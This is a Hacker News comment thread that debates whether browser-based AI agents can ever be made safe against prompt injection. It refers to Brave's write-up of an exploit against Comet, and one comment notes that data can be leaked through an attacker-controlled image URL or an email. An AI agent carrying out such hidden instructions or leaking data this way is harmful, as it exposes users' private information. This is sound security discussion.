←back to thread

645 points helloplanets | 3 comments | | HN request time: 0.21s | source
Show context
ec109685 ◴[] No.45005397[source]
It’s obviously fundamentally unsafe when Google, OpenAI and Anthropic haven’t released the same feature and instead use a locked down VM with no cookies to browse the web.

LLM within a browser that can view data across tabs is the ultimate “lethal trifecta”.

Earlier discussion: https://news.ycombinator.com/item?id=44847933

It’s interesting that in Brave’s post describing this exploit, they didn’t reach the fundamental conclusion this is a bad idea: https://brave.com/blog/comet-prompt-injection/

Instead they believe model alignment, trying to understand when a user is doing a dangerous task, etc. will be enough. The only good mitigation they mention is that the agent should drop privileges, but it’s just as easy to hit an attacker controlled image url to leak data as it is to send an email.

replies(7): >>45005444 #>>45005853 #>>45006130 #>>45006210 #>>45006263 #>>45006384 #>>45006571 #
snet0 ◴[] No.45005853[source]
> Instead they believe model alignment, trying to understand when a user is doing a dangerous task, etc. will be enough.

Maybe I have a fundamental misunderstanding, but I feel like hoping that model alignment and in-model guardrails are statistical preventions, ie you'll reduce the odds to some number of zeroes preceeding the 1. These things should literally never be able to happen, though. It's a fools errand to hope that you'll get to a model where there is no value in the input space that maps to <bad thing you really don't want>. Even if you "stack" models, having a safety-check model act on the output of your larger model, you're still just multiplying odds.

replies(5): >>45006201 #>>45006251 #>>45006358 #>>45007218 #>>45007846 #
1. closewith ◴[] No.45007846[source]
All modern computer security is based on trying to improbabilities. Public key cryptography, hashing, tokens, etc are all based on being extremely improbable to guess, but not impossible. If an LLM can eventually reach that threshold, it will be good enough.
replies(2): >>45018295 #>>45084653 #
2. recursive ◴[] No.45018295[source]
Cryptography's risk profile is modeled against active adversaries. The way probability is being thrown around here is not like that. If you find 1 in a billion in the full training set of data that triggers this behavior, that's not the same as 1 in a billion against an active adversary. In cryptography there are vulnerabilities other than brute force.
3. SAI_Peregrinus ◴[] No.45084653[source]
That threshold would require more than 30 orders of magnitude improvement in the probability given a 1/100,000,000 current probability of an LLM violating alignment. The current probability is much, much higher than that, but let's cut the LLMs some slack & pretend. Improving by a factor of 10^30 is extremely unlikely.